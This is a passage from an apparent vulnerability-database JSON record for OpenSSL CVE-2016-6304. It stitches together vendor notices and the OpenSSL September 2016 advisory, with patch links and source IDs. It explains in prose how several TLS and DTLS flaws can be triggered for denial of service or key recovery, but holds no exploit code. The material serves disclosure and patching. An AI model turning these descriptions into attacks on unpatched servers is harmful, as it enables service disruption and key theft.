https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. The JBoss server process must be restarted for the update\nto take effect. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-6304" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "BID", "id": "93150" }, { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "142849" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-6304", "trust": 3.8 }, { "db": "BID", "id": "93150", "trust": 2.0 }, { "db": "MCAFEE", "id": "SB10171", "trust": 1.7 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "SECTRACK", "id": "1036878", "trust": 1.7 }, { "db": "SECTRACK", "id": "1037640", "trust": 1.7 }, { "db": "PACKETSTORM", "id": "139091", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004990", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2021.0680", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4645", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-21-054-03", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201609-579", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-6304", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142848", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143874", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "142849", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143176", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "139769", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "143181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6304" }, { "db": "BID", "id": "93150" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "PACKETSTORM", "id": "142848" }, { "db": "PACKETSTORM", "id": "143874" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "142849" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "139769" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "CNNVD", "id": "CNNVD-201609-579" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "id": "VAR-201609-0593", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.37975769357142847 }, "last_update_date": "2024-07-23T22:01:08.857000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "hitachi-sec-2017-103", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-103/index.html" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.1.0 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.1.0-notes.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Security updates for all active release lines, September 2016", "trust": 0.8, "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/" }, { "title": "Fix OCSP Status Request extension unbounded memory growth", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=2c0d295e26306e15a92eb23a84a1802005c1c137" }, { "title": "OCSP Status Request extension unbounded memory growth (CVE-2016-6304)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "title": "SUSE-SU-2016:2470", "trust": 0.8, "url": "https://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv#opensslvulnerabilitiesincludingsweet32addressedbyversionupgradeto101uand102jspl129207" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "hitachi-sec-2017-103", "trust": 0.8, "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hitachi-sec-2017-103/index.html" }, { "title": "OpenSSL Repair measures for memory leaks", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=64358" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/09/23/openssl_swats_a_dozen_bugs_one_notable_nasty/" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162802 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171659 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.16 natives update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171658 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 6", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171414 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 for RHEL 7", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171413 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171415 - security advisory" }, { "title": "Amazon Linux AMI: ALAS-2016-749", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-749" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Red Hat: CVE-2016-6304", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-6304" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-6304" }, { "title": "Red Hat: Important: Red Hat JBoss Web Server 3.1.0 Service Pack 1 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171801 - security advisory" }, { "title": "Red Hat: Important: Red Hat JBoss Web Server Service Pack 1 security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20171802 - security advisory" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Debian CVElist Bug Report Logs: Security fixes from the October 2016 CPU", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=712a3573d4790c3bc5a64dddbbf15d5d" }, { "title": "Forcepoint Security Advisories: CVE-2016-6304 OCSP Status Request Extension Security Vulnerability", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=9b728419f5660d2dfe495a4122ce2f24" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": 